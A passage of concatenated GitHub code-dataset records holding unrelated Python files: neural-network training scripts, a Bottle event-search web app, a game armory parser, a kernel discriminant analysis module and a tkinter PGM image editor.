CCInp=[Start,Coffee,Cream,Stir,Water,Stir]\r\n# CCOut=[Coffeeout,Creamout,Stirout,Waterout,Stirout,Coffeebev]\r\n\r\n# inputBatch.append(CCInp)\r\n# outputBatch.append(CCOut)\r\n\r\n\r\ntotal_series_length = 50000\r\necho_step = truncatedBackpropLength\r\nbatch_length = int(total_series_length/batchSize)\r\n\r\ndef generateData():\r\n\tx = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))\r\n\ty = np.roll(x, echo_step)\r\n\ty[0:echo_step] = 0\r\n\r\n\ty_hot = [(1-yTemp)*[1,0] + yTemp*[0,1] for yTemp in y]\r\n\r\n\r\n\ty_hot_list = []\r\n\tfor i in range(batchSize):\r\n\t\ty_hot_Temp = y_hot[i*batch_length:i*batch_length+batch_length]\r\n\t\ty_hot_list.append(y_hot_Temp)\r\n\r\n\tx = x.reshape((batchSize, batch_length)) # The first index changing slowest, subseries as rows\r\n\t# y_hot = y_hot.reshape((batchSize, batch_length))\r\n\r\n\treturn (x, y_hot_list)\r\n\r\n\r\nx, y = generateData()\r\n\r\nprint('Size of X: ' + str(len(x)) + '*' + str(len(x[0])))\r\nprint('Size of Y: ' + str(len(y)) + '*' + str(len(y[0])))\r\n\r\nimport random\r\n\r\nTRAIN_STEPS = 50000\r\nweightList1 = []\r\nweightList2 = []\r\nweightList3 = []\r\nweightList4 = []\r\n# with sess.as_default():\r\nfor i in range(TRAIN_STEPS):\r\n\t# randIndex = random.randint(truncatedBackpropLength, len(x[0]))\r\n\trandIndex = i+truncatedBackpropLength\r\n\r\n\tx_train = x[:,randIndex-truncatedBackpropLength:randIndex]\r\n\ty_train = [tempRow[randIndex-truncatedBackpropLength:randIndex] for tempRow in y]\r\n\t# y[:,randIndex-truncatedBackpropLength:randIndex]\r\n\r\n\tx_train = x_train.reshape((batchSize, truncatedBackpropLength, 1))\r\n\t# y_train = y_train.reshape((batchSize, truncatedBackpropLength, 2))\r\n\r\n\r\n\tsess.run(training, feed_dict={x_batch: x_train, y_batch: y_train})\r\n\r\n\tif (i%100==0):\r\n\t\t# randIndex = random.randint(truncatedBackpropLength, len(x[0]))\r\n\t\trandIndex = i+truncatedBackpropLength\r\n\r\n\t\tx_test = x[:,randIndex-truncatedBackpropLength:randIndex]\r\n\t\ty_test = [tempRow[randIndex-truncatedBackpropLength:randIndex] for tempRow in y]\r\n\t\t# y[:,randIndex-truncatedBackpropLength:randIndex]\r\n\r\n\t\tx_test = x_test.reshape((batchSize, truncatedBackpropLength, 1))\r\n\t\t# y_test = y_test.reshape((batchSize, truncatedBackpropLength, 1))\r\n\r\n\t\t# print('input: ')\r\n\t\t# print(x_test)\r\n\r\n\t\tprint('Training Step: ' + str(i) + ' Accuracy = ' + str(sess.run(accuracy_final, feed_dict={x_batch: x_train, y_batch: y_train})) + ' Loss = ' + str(sess.run(cross_final, {x_batch: x_train, y_batch: y_train})))\r\n\t\t\r\n\t\tb = sess.run(W3)\r\n\t\tweightList1.append(b[0])\r\n\t\tweightList2.append(b[1])\r\n\r\n\t\tc = sess.run(W4)\r\n\t\tweightList3.append(c[2])\r\n\t\tweightList4.append(c[3])\r\n\t\t# print(b[:,6:8])\r\n\r\n\t# context = tf.Variable(tf.zeros([batchSize, numOfHiddenNodes]), dtype=tf.float32)\r\n\r\nimport matplotlib.pyplot as plt \r\nplt.figure(1)\r\nplt.subplot(411)\r\nplt.plot(weightList1)\r\nplt.subplot(412)\r\nplt.plot(weightList2)\r\nplt.subplot(413)\r\nplt.plot(weightList3)\r\nplt.subplot(414)\r\nplt.plot(weightList4)\r\nplt.ylabel('some numbers')\r\nplt.show()","repo_name":"dshahnazian/Recurrent-neural-network","sub_path":"Danesh_RNN_General.py","file_name":"Danesh_RNN_General.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6055658836","text":"import bottle\nfrom bottle import Bottle,route,run,request,template,static_file\nimport json\nfrom sys import argv\nimport requests\n@route('/',method=\"get\")\ndef eventfull():\n return template ('template.tpl')\n@route('/eventfull',method=\"post\")\ndef eventfull():\n ciudad = request.forms.get('ciudad')\n tipo = request.forms.get('tipo')\n a=open(\".key_eventfull.txt\",\"r\")\n key=a.readline()\n payload={\"app_key\":key, \"location\": ciudad, \"keywords\":tipo}\n r=requests.get(\"http://api.eventful.com/json/events/search?keywords=\"+tipo+\"&location=\"+ciudad+\"&app_key=\"+key)\n if r.status_code == 200:\n js=json.loads(r.text)\n titulo=[]\n empezar=[]\n lugar=[]\n for i in js[\"events\"][\"event\"]:\n titulo.append(i[\"title\"])\n empezar.append(i[\"start_time\"])\n lugar.append(i[\"venue_name\"])\n return template('template2.tpl', titulo=titulo, empezar=empezar, lugar=lugar, ciudad=ciudad, tipo=tipo)\n\n@route('/static/')\ndef server_static(filepath):\n\treturn static_file(filepath, root='static')\n\nif __name__ == '__main__':\n\trun(host='0.0.0.0',port=argv[1])","repo_name":"juanjoselopezroldan/prueba_bottle","sub_path":"eventfull.py","file_name":"eventfull.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18420184567","text":"\"\"\" Character Summary parsing functions \"\"\"\n\nimport re\n\nfrom src.itemParser import getItemInfos\nfrom src.utils import getHtmlText\nfrom src.gearScore import createGearScoreDictionnary\n\n\ndef hasEnchantProfession(profession, minProfLvl):\n \"\"\" Check if character has profession enchant above a determined level \"\"\"\n profLvl = int(re.search(r'\\d+', profession).group(0))\n return profLvl >= minProfLvl\n\n\ndef processItems(itemsList, isBlacksmith, isEnchanter, isHunter, isWarrior):\n \"\"\" Process each items to know if they are fully optimised \"\"\"\n\n notEnchantedItems = []\n notGemmedItems = []\n totalItemLvl = 0\n totalGearScore = 0\n equippedItems = 0\n # Fury war has special calculation method taking in account having 2 2H weaps\n hasAlreadyATwoHandWeapOn = False\n twoHandWeapGearScore = [0, 0]\n # Calling it here so we only create it once per command\n gearScoreDict = createGearScoreDictionnary()\n\n excludedSlots = ['Shirt', 'Tabard']\n itemsToBeEnchant = ['Head', 'Shoulder', 'Back', 'Chest',\n 'Wrist', 'Hands', 'Legs', 'Feet',\n 'One-hand', 'Off Hand', 'Two-hand']\n\n if isEnchanter:\n itemsToBeEnchant.append('Finger')\n if isHunter:\n itemsToBeEnchant.append('Ranged')\n\n # Blacksmith can get another gem slot on some items (badly reported in url)\n itemsToBeBlacksmithEnchant = ['Wrist', 'Hands']\n\n for item in itemsList:\n # Power is there to reach an 'API' (not a real one btw...)\n itemUrl = item.find('a').get('href') + '&power=true'\n infosFromRel = item.find('a').get('rel')\n itemAdditionnalInfos = re.search(\n '&{1}.*', infosFromRel[0]) if infosFromRel is not None else None\n\n if itemAdditionnalInfos is not None:\n itemAdditionnalInfos = itemAdditionnalInfos.group(0)\n itemUrl += itemAdditionnalInfos\n\n if '#self' not in itemUrl:\n itemInfos = getItemInfos(itemUrl, gearScoreDict)\n itemSlot = itemInfos['itemSlot']\n\n hasToHaveBonusGemSlot = itemSlot == 'Waist' or (\n itemSlot in itemsToBeBlacksmithEnchant and isBlacksmith)\n if hasToHaveBonusGemSlot:\n itemInfos = getItemInfos(itemUrl, gearScoreDict, hasToHaveBonusGemSlot)\n\n # Checking what is missing in item\n if itemInfos['missingGems']:\n notGemmedItems.append(itemSlot)\n if itemInfos['missingEnchant'] and itemSlot in itemsToBeEnchant:\n notEnchantedItems.append(itemSlot)\n if itemSlot not in excludedSlots:\n equippedItems += 1\n totalItemLvl += itemInfos['itemLevel']\n totalGearScore += itemInfos['itemGearScore']\n\n # pylint: disable=too-many-boolean-expressions\n if isWarrior and (itemInfos['itemSlot'] == 'Two-hand' or (\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Two-hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'One-hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Off Hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Held In Off-Hand')\n )):\n minGs = min(twoHandWeapGearScore)\n twoHandWeapMinIndex = twoHandWeapGearScore.index(minGs)\n twoHandWeapGearScore[twoHandWeapMinIndex] = itemInfos['itemGearScore']\n\n # Getting new values after modifications\n minGs = min(twoHandWeapGearScore)\n maxGs = max(twoHandWeapGearScore)\n\n # To calculate gearscore, we have to ignore the second 2H weap GS,\n # get the difference between Main Hand and Off Hand\n # divide it by 2, round it up and substract it to the total sum\n # If difference is equal to 1\n # That means we are crawling first weapon or the character is wearing only\n # one Two hands weapon\n if minGs != 0:\n differenceBetweenTwoHandWeaps = int((maxGs - minGs)/2) + 1\n\n if hasAlreadyATwoHandWeapOn:\n totalGearScore -= minGs + differenceBetweenTwoHandWeaps\n else:\n hasAlreadyATwoHandWeapOn = True\n\n if equippedItems != 0:\n avgItemLvl = \"%.2f\" % float(totalItemLvl/equippedItems)\n else:\n avgItemLvl = 0\n\n return {\n 'notEnchantedItems': notEnchantedItems,\n 'notGemmedItems': notGemmedItems,\n 'avgItemLvl': avgItemLvl,\n 'itemGearScore': totalGearScore,\n }\n\n\ndef processList(providedList):\n \"\"\" Process the provided items list \"\"\"\n items = []\n\n for item in providedList.findAll(class_='text'):\n items.append(' '.join(item.text.split()).replace(' / ', '/'))\n\n return items\n\n\ndef getCharInfos(\n url='http://armory.warmane.com/character/Ashaladin/Icecrown/summary', htmlText=None\n):\n \"\"\" Get character informations \"\"\"\n\n if htmlText is None:\n html = getHtmlText(url)\n else:\n html = htmlText\n\n # Ensure char is found before scrap anything else\n if len(html.findAll(string=re.compile(r'Page not found'))) > 0:\n return 'Character not found, please check your informations and try again.'\n\n charMainInfos = html.find(class_='information-left')\n\n # Hunter will need to have Ranged slot checked (enchant)\n isHunter = 'Hunter' in charMainInfos.text\n isWarrior = 'Warrior' in charMainInfos.text\n\n # Grouping variables:\n # First group is html info retrieving\n # Second is extracted data\n charAndGuildName = charMainInfos.find(class_='name').text.split(' ')\n itemsPath = html.findAll(class_='item-slot')\n specsPath = html.find(class_='specialization')\n professionsSummary = []\n professionsPath = html.findAll(class_='profskills')\n isBlacksmith = False\n isEnchanter = False\n\n charName = charAndGuildName.pop(0).strip()\n guildName = ' '.join(charAndGuildName) if charAndGuildName[0] != u'\\xa0' else 'No Guild'\n lvlRaceClass = charMainInfos.find(class_='level-race-class').text.strip()\n\n professions = []\n for professionsType in professionsPath:\n professions.append(processList(professionsType))\n\n # Processing multiple arrays into one (1 array per professionType (main & secondary profs))\n for professionType in professions:\n for profession in professionType:\n # We have to check blacksmith level to ensure the bonus gem slots are available\n if 'Blacksmithing' in profession:\n isBlacksmith = hasEnchantProfession(profession, 400)\n if 'Enchanting' in profession:\n isEnchanter = hasEnchantProfession(profession, 400)\n professionsSummary.append(profession)\n\n getSpecializations = processList(specsPath)\n itemsCheck = processItems(itemsPath, isBlacksmith, isEnchanter, isHunter, isWarrior)\n\n summary = {\n 'url': url,\n 'charName': charName,\n 'guildName': guildName,\n 'lvlRaceClass': lvlRaceClass,\n 'professions': professionsSummary,\n 'specs': getSpecializations,\n 'itemsCheck': itemsCheck\n }\n\n return summary\n","repo_name":"Rdyx/warmane-armory-bot","sub_path":"src/charsumParser.py","file_name":"charsumParser.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26780102096","text":"#liste gibi ama her elemanı bir kez ekleyebiliriz\nlistem=[1,2,3,2,3]\nsetim=set(listem)\nprint(setim)\n#seti direk tanımlama\nset2={\"a\",\"b\",\"c\"}\nset2.add(\"d\")\nprint(set2)\n#boş set tanımlama\nset3=set()\n","repo_name":"semihuzunCE/Python","sub_path":"3-setler.py","file_name":"3-setler.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40739251764","text":"\"\"\"\r\nThis is a test for classify the trajectories.\r\nWE have three kinds of trajectories: | L_D| c_aphi| c_h|\r\n with label: | 0 | 1 | 2 |\r\n\r\nTry to use linear+LSTM+linear NET.\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport os\r\nfrom utils.dataset import dataset,collate_fn\r\nimport torch.nn as nn\r\nimport torch.optim\r\nimport torch.utils.data as Data\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom Classify_net import Classify\r\nfrom utils.d_process import *\r\nfrom torch.optim import lr_scheduler\r\nfrom train_util import train, trainlog\r\nimport logging\r\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n# Hyper Parameters\r\nINPUT_SIZE = 6\r\nOUTPUT_SIZE = 3\r\nTIME_STEP = 1200\r\nLINEAR1_OUT = 32 # D:通过6维输入,提取另外的特征 *2\r\nHIDDEN_SIZE = 64 # 记录调试日志\r\nBATCH_SIZE = 64 #NUM_LATERS = 2 #\r\nLR = 0.01\r\nN_TRAIN_POINTS = 100 #没有用到\r\nEPOCH = 1000 #没有用到\r\nMAX_LEN = 600\r\n\r\nsave_dir = r'F:\\classi\\model_test_1_16/'\r\nif not os.path.exists(save_dir):\r\n os.makedirs(save_dir)\r\nlogfile = '%s/trainlog.log'%save_dir\r\ntrainlog(logfile)\r\n# 原始数据\r\nrawdata_root = r'F:\\classi\\train/'\r\n# 读标签\r\nall_pd = pd.read_csv(r\"F:\\HXDD/dataset_train.csv\", sep=\",\",\r\n header=None,\r\n names=[\"file_name\",\"label\"])[1:] ##加r''的目的在于啥 ,dataset_train.csv好像有点不对\r\n\r\n#print(all_pd.head())\r\n# 训练数据和测试数据划分\r\ntrain_pd, val_pd = train_test_split(all_pd, test_size=0.25, random_state=43,\r\n stratify=all_pd['label']) #去查下这个函数的用法 2020-10-20 有可能指的是标签只有1维\r\n# print(val_pd.shape)\r\n\r\n# 数据预测处理\r\ndata_process = {\r\n 'train':data_process(max_len=MAX_LEN),\r\n 'val':data_process(max_len=MAX_LEN)\r\n}\r\ndata_set={}\r\ndata_set['train']=dataset(trajroot=rawdata_root, anno_pd=train_pd,\r\n dprocess=data_process['train']) #train_pd 应该调成 val_pd,原先为train_pd\r\ndata_set['val']=dataset(trajroot=rawdata_root, anno_pd=val_pd,\r\n dprocess=data_process['val']) #train_pd 应该调成 val_pd,原先为train_pd\r\n# sklearn读取数据,数据打包\r\ndataloader={}\r\ndataloader['train']=torch.utils.data.DataLoader(data_set['train'],batch_size=BATCH_SIZE,\r\n shuffle=True,num_workers=0,collate_fn=collate_fn) #参数决定了由几个进程来处理\r\n\r\ndataloader['val']=torch.utils.data.DataLoader(data_set['val'],batch_size=BATCH_SIZE,\r\n shuffle=True,num_workers=0,collate_fn=collate_fn)\r\n\r\n'''model'''\r\nmodel = Classify()\r\nbase_lr = 0.01\r\nresume = None\r\n# 第一次运行使用resume=None\r\n# resume=None\r\nif resume:\r\n # 加载已有模型\r\n model.eval()\r\n model.load_state_dict(torch.load(resume))\r\nmodel.double() # cuda之前需要将数据转换\r\nmodel.cuda()\r\n\r\n\r\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001,betas=(0.9, 0.999), eps= 1e-08, weight_decay=1e-5)\r\ncriterion = nn.CrossEntropyLoss()\r\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1) # 设置学习率,lr*gama^(epoch/step_size)\r\nif __name__ == '__main__':\r\n train(model,\r\n epoch_num=100,\r\n start_epoch=0,\r\n optimizer=optimizer,\r\n criterion=criterion,\r\n exp_lr_scheduler=exp_lr_scheduler,\r\n data_set=data_set,\r\n data_loader=dataloader,\r\n save_dir=save_dir,\r\n print_inter=50,\r\n val_inter=400)\r\n\r\n","repo_name":"Xie-JunWei/lstm-network","sub_path":"classify/classify_train.py","file_name":"classify_train.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71150670171","text":"from wb0configs import configs\nfrom wb0configs.helpers import store_file, load_file\nfrom collections import defaultdict\nimport random\nimport torch\nfrom tqdm import tqdm\n\n\ndef pool_sections_embed(e_id_sec_embed):\n print(\"pool_sections_embed\")\n\n e_id_embed = load_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", ftype=\"pkl\")\n #e_id_embed = load_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", ftype=\"pkl\")\n\n if e_id_embed == None:\n e_id_embed = dict()\n\n for e, sec in e_id_sec_embed.items():\n e_id_embed[e] = torch.mean(torch.stack(list(sec.values())), dim=0)\n\n store_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", e_id_embed, \"pkl\", \"csv\")\n return e_id_embed\n\n\n\ndef create_node_features(node_list, e_id_embed):\n print(\"create_node_features\")\n\n #node_features = torch.Tensor(len(node_list),768)\n node_features = dict()\n\n for i, (e_id, e_features) in enumerate(node_list):\n if e_id in e_id_embed.keys():\n e_emb = e_id_embed[e_id]\n #node_features[i] = e_emb\n node_features[e_id] = e_emb\n else: ## for some entities there exist no embeddings\n e_id= random.choice(node_list)[0]\n e_emb = e_id_embed[e_id]\n #node_features[i] = e_emb\n node_features[e_id] = e_emb\n\n return node_features\n\n\n\ndef create_edge_features(aggr_edge_list, c_id_ent_id_embed):\n print(\"create_edge_features\")\n\n #edge_features = torch.Tensor(len(aggr_edge_list), 768)\n edge_features = defaultdict(torch.FloatTensor)\n\n for i, (e_id_1, e_id_2, c_features) in tqdm(enumerate(aggr_edge_list)):\n c_ids = c_features[\"conflict_ids\"]\n for c_id in c_ids:\n #edge_features[i] = c_id_ent_id_embed[c_id][0]\n edge_features[(e_id_1, e_id_2)] = torch.cat((edge_features[(e_id_1, e_id_2)], c_id_ent_id_embed[c_id].view(1,-1)),0)\n edge_features[(e_id_1, e_id_2)] = torch.mean(edge_features[(e_id_1, e_id_2)], 0)\n return edge_features\n\n\nif __name__ == \"__main__\":\n\n config = configs.ConfigBase()\n\n node_list = load_file(config.get_path(\"task\") / \"network_structure\" / \"node_list\", ftype = \"pkl\")\n e_id_sec_embed = load_file(config.get_path(\"entity_embed\") / \"e_id_sec_embed_tfidf\", ftype=\"pkl\")\n e_id_embed = pool_sections_embed(e_id_sec_embed)\n\n node_features = create_node_features(node_list, e_id_embed)\n\n aggr_edge_list = load_file(config.get_path(\"task\") / \"network_structure\" / \"aggr_edge_list\", ftype = \"pkl\")\n c_id_ent_id_embed = load_file(config.get_path(\"conflict_embed\") / \"c_id_ent_id_embed_tfidf\", ftype=\"pkl\")\n edge_features = create_edge_features(aggr_edge_list, c_id_ent_id_embed)\n\n store_file(config.get_path(\"task\") / \"network_features\" / \"node_features\", node_features, \"pkl\", \"csv\")\n store_file(config.get_path(\"task\") / \"network_features\" / \"edge_features\", edge_features, \"pkl\", \"csv\")\n\n","repo_name":"conflict-AI/conflictwiki","sub_path":"code/wb4task/task_construction/network_features.py","file_name":"network_features.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"27898216650","text":"import numpy as np\nfrom sklearn.metrics import pairwise_distances\nfrom sklearn.metrics.pairwise import rbf_kernel, polynomial_kernel,linear_kernel\n\n\n\nclass centred_kernel(object):\n def __init__(self, kernel, centred=True, gamma=None, degree=3, coef0=1):\n self._kernel_type = kernel\n self._gamma = gamma\n self._degree = degree\n self._coef0 = coef0\n self._centred = centred\n\n def fit(self, X):\n self._X = X.copy()\n return self\n\n def fit_transform(self, X):\n self._X = X.copy()\n self._n = X.shape[0]\n if self._kernel_type == 'rbf':\n K = rbf_kernel(X, gamma=self._gamma)\n elif self._kernel_type == 'poly':\n K = polynomial_kernel(X, degree=self._degree, coef0=self._coef0)\n elif self._kernel_type == 'linear':\n K = linear_kernel(X)\n if self._centred == True:\n\n \"\"\"\n YOUR CODE\n\n \"\"\"\n sumK = np.sum(K, 0)\n K1 = 1. / self._n * np.tile(np.reshape(sumK, (-1, 1)), (1, self._n))\n K2 = 1. / self._n * np.tile(np.reshape(sumK, (1, -1)), (self._n, 1))\n self._K = K.copy()\n Ko = K - K1 - K2 + np.mean(K)\n else:\n Ko = K\n return Ko\n\n def transform(self, X):\n nt = X.shape[0]\n if self._kernel_type == 'rbf':\n K = rbf_kernel(X, self._X, gamma=self._gamma)\n elif self._kernel_type == 'poly':\n K = polynomial_kernel(X, self._X, degree=self._degree,\n coef0=self._coef0)\n elif self._kernel_type == 'linear':\n K = linear_kernel(X, self._X)\n if self._centred == True:\n\n \"\"\"\n YOUR CODE\n \"\"\"\n K1 = (K - 1. / self._n * np.ones((nt, self._n)).dot(self._K))\n K2 = np.eye(self._n) - 1. / self._n * np.ones((self._n, self._n))\n Ko = K1.dot(K2)\n else:\n Ko = K\n return Ko\n\n\n\ndef sorted_spectrum(A):\n complex_eig_val, complex_eig_vec = np.linalg.eig(A)\n eig_val = complex_eig_val.real\n orden = np.argsort(eig_val)[::-1]\n eig_val = eig_val[orden]\n eig_vec = complex_eig_vec.real\n eig_vec = eig_vec[:,orden]\n return eig_val, eig_vec\n\ndef kgda(K, y, tau = 1e-6):\n # K already centred!!\n n = K.shape[0]\n v_classes = np.unique(y)\n M_ = np.mean(K,1)\n P = len(v_classes)\n M_Mp = np.empty((n,P))\n #Sb\n Sb = np.zeros((n,n))\n Sw = np.zeros((n,n))\n for p in range(P):\n idx_class_p = np.where(y==v_classes[p])[0]\n n_p = len(idx_class_p)\n Kp = K[:,idx_class_p]\n Mp = np.mean(Kp,1)\n M_Mp[:,p] = Mp.copy()\n MpM_ = Mp - M_\n Sb += n_p* np.outer(MpM_, MpM_.T) # column * row\n Sw += 1./n_p* Kp.dot(Kp.T) - np.outer(Mp, Mp.T)\n #Sw inv\n if np.linalg.matrix_rank(Sw) < n:\n Sw += tau*np.eye(n)\n iSw = np.linalg.inv(Sw)\n AA = iSw.dot(Sb)\n DD2, UU2 = sorted_spectrum(AA)\n lam = DD2[:P-1]\n A = UU2[:,:P-1]\n VMp = A.T.dot(M_Mp)\n return A, VMp.T\n\ndef predict_kgda(K_test, A, Q, v_classes=None):\n # Ktest centred!!\n # Q projection of class means!!\n if v_classes is None:\n P = Q.shape[0]\n v_classes = np.array([int(cc) for cc in range(P)])\n U = K_test.dot(A)\n Distance_sample_mean = pairwise_distances(U, Q)\n closest_mean = np.argmin(Distance_sample_mean,1)\n output = np.array([v_classes[ii] for ii in closest_mean])\n return output, U","repo_name":"fredchettouh/uc3m_ml","sub_path":"kernel_mva/klda.py","file_name":"klda.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29133475410","text":"import numpy\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk\r\n\r\n#Reading of the original file\r\ndef get_pgm_data():\r\n try:\r\n global filename\r\n filename = e.get()\r\n with open(filename, \"r\") as f:\r\n content = f.readlines()\r\n global size\r\n size=[]\r\n global Lmax \r\n Lmax=0\r\n global data\r\n data=[]\r\n global comments\r\n comments=[]\r\n for line in list(content):\r\n if line[0] == \"#\":\r\n comments.append(line)\r\n content.remove(line)\r\n if content[0].strip() != \"P2\":\r\n e.delete(0, END)\r\n status['text'] = \"Това не е PGM файл\"\r\n else:\r\n size = [int(el) for el in content[1].strip().split()]\r\n Lmax = int(content[2].strip())\r\n for line in content[3:]:\r\n for el in line.split():\r\n data.append(int(el))\r\n #get_file_button['state'] = DISABLED #if you remove the comment the program will work only with 1 file \r\n status['text'] = \"Файлът беше успешно зареден\"\r\n open_file['state'] = ACTIVE\r\n except OSError:\r\n status['text'] = \"Файлът не е намерен\"\r\n \r\n#Showing the original image on the screen\r\ndef open_original_pgm():\r\n original_image = Toplevel(root)\r\n original_image.iconbitmap(\"img\\\\icona.ico\")\r\n original_image.title(filename)\r\n original_image.resizable(0,0)\r\n original_image.transient(root)\r\n #using nympy array to get the image information\r\n new_data = numpy.array(data).reshape(size[1], size[0])\r\n #creating and displaying of the image on the screen\r\n img = ImageTk.PhotoImage(image = Image.fromarray(new_data))\r\n c = Canvas(original_image, width=size[0], height=size[1])\r\n c.pack()\r\n c.create_image(0,0, anchor=\"nw\", image = img)\r\n #right click mouse event for showing the additional field on the screen\r\n c.bind(\"\", enable_mod)\r\n koef_text = Label(original_image, text=\"коефициент:\")\r\n koef_text.pack(side=LEFT)\r\n\r\n k_v = Entry(original_image, width=15)\r\n k_v.pack(side=LEFT)\r\n\r\n stepen_text = Label(original_image,text=\"степен:\")\r\n stepen_text.pack(side=LEFT)\r\n\r\n img4 = PhotoImage(file=\"img\\\\adjust.png\")\r\n\r\n s_v = Entry(original_image, width=15)\r\n s_v.pack(side=LEFT)\r\n #calling the input validation function for both fields to ensure only numerals are entered\r\n reg = original_image.register(only_numbers)\r\n k_v.config(validate=\"key\", validatecommand=(reg, '%S'))\r\n s_v.config(validate=\"key\", validatecommand=(reg, '%S'))\r\n #lambda function to use the inputs from the fields otherwise tkinter can't use them\r\n x = lambda:open_modified_pgm(float(k_v.get()), float(s_v.get()))\r\n\r\n global modify\r\n modify = Button(original_image, image=img4, compound=\"left\", text= \"Промени\", state=DISABLED, command=x)\r\n modify.pack(side=RIGHT)\r\n\r\n #positioning of the image according to the main window\r\n original_image.update_idletasks()\r\n windowWidth = original_image.winfo_reqwidth()\r\n windowHeight = original_image.winfo_reqheight()\r\n # Gets both half the screen width/height and window width/height\r\n positionRight = int(original_image.winfo_screenwidth()/2 - windowWidth/2-(windowHeight/2))\r\n positionDown = int(original_image.winfo_screenheight()/2 - windowHeight/2)\r\n # Positions the window in the center of the page.\r\n original_image.geometry(\"+{}+{}\".format(positionRight, positionDown))\r\n\r\n original_image.mainloop()\r\n \r\n#Showing the moified image on the screen\r\ndef open_modified_pgm(k,s):\r\n modified_image = Toplevel(root)\r\n modified_image.iconbitmap(\"img\\\\icona.ico\")\r\n modified_image.title(filename.rstrip(\".pgm\")+\"_mod.pgm\")\r\n modified_image.resizable(0,0)\r\n modified_image.transient(root)\r\n global data1\r\n #creating and modifying of the new image \r\n data1 = numpy.array(data).reshape(size[1], size[0])\r\n with numpy.nditer(data1, op_flags=['readwrite']) as it:\r\n for x in it:\r\n x[...] = Lmax*(x/Lmax)**(k/s)\r\n img = ImageTk.PhotoImage(image = Image.fromarray(data1))\r\n c = Canvas(modified_image, width=size[0], height=size[1])\r\n c.pack()\r\n c.create_image(0,0, anchor=\"nw\", image = img)\r\n img5 = PhotoImage(file=\"img\\\\sd-card.png\")\r\n open_file = Button(modified_image, image=img5, compound=\"left\", text= \"Запази\", command=save_new_pgm, state=ACTIVE)\r\n open_file.pack(side=BOTTOM)\r\n modify['state'] = DISABLED\r\n status['text'] = \"Модификация на файла...\"\r\n #positioning of the image according to the main window\r\n modified_image.update_idletasks()\r\n windowWidth = modified_image.winfo_reqwidth()\r\n windowHeight = modified_image.winfo_reqheight()\r\n # Gets both half the screen width/height and window width/height\r\n positionRight = int(modified_image.winfo_screenwidth()/2 - windowWidth/2+(windowHeight/2))\r\n positionDown = int(modified_image.winfo_screenheight()/2 - windowHeight/2)\r\n # Positions the window in the center of the page.\r\n modified_image.geometry(\"+{}+{}\".format(positionRight, positionDown))\r\n\r\n modified_image.mainloop()\r\n \r\n#saving the modified mage as a file\r\ndef save_new_pgm():\r\n with open(filename.rstrip(\".pgm\")+\"_mod.pgm\", \"w\") as f:\r\n f.writelines(\"P2\\n\")\r\n f.writelines(\"# modified by PGM Read&Modify\\n\")\r\n for line in list(comments):\r\n #if the file was aleady modified by the program, making sure to remove the comment\r\n if line.strip() == \"# modified by PGM Read&Modify\":\r\n comments.remove(line)\r\n else:\r\n f.writelines(line)\r\n f.writelines(str(size[0])+\" \"+str(size[1])+\"\\n\")\r\n f.writelines(str(Lmax)+\"\\n\")\r\n #formating the image information so it can be dispalyed properly by any app\r\n for line in data1.tolist():\r\n f.writelines(str(line)[str(line).find(\"[\")+1 : str(line).find(\"]\")].replace(\",\", \"\")+\"\\n\") \r\n status['text'] = \"Файлът беше записан успешно като \"+filename.rstrip(\".pgm\")+\"mod.pgm\"\r\n\r\n#input validation to make sure the iput is either a number, a space or a dot f0r floatng numbers\r\ndef only_numbers(inp):\r\n if inp.isdigit():\r\n return True\r\n elif inp == \"\":\r\n return True\r\n elif inp == \".\":\r\n return True\r\n else:\r\n return False\r\n\r\n#changing the state of \"Change\" button(\"Промени\")\r\ndef enable_mod(event):\r\n modify['state'] = ACTIVE\r\n\r\n#using this to be able to call get_pgm_data via enter button\r\ndef call_get_pgm(event):\r\n get_pgm_data()\r\n\r\n#function to use in event to create a popup menu\r\ndef popup(event):\r\n try:\r\n popup_menu.tk_popup(event.x_root, event.y_root,0)\r\n finally:\r\n popup_menu.grab_release()\r\n\r\n\r\n\r\n#Creating of the main window\r\nroot = Tk()\r\nroot.iconbitmap(\"img\\\\icona.ico\")\r\nroot.title(\"PGM Read&Modify\")\r\nroot.resizable(0,0) #this disables rezising of the window\r\n#root.attributes(\"-toolwindow\",1) #hides the window control button under windows. As a side effect it also hides the program icon.\r\n#root.overrideredirect(1) #hides all the elements of the window control manager. Bad idea to use under winodws, works on linux or mac though.\r\n\r\n#Creating the top frame where the buttons and path to file elements reside\r\ntop_frame = Frame(root)\r\ntop_frame.pack(side=TOP, fill=X)\r\n\r\n#Creating of the bottom frame to hold the status bar element\r\nbottom_frame = Frame(root)\r\nbottom_frame.pack(side=BOTTOM, fill=X)\r\nfilename = Label(top_frame, 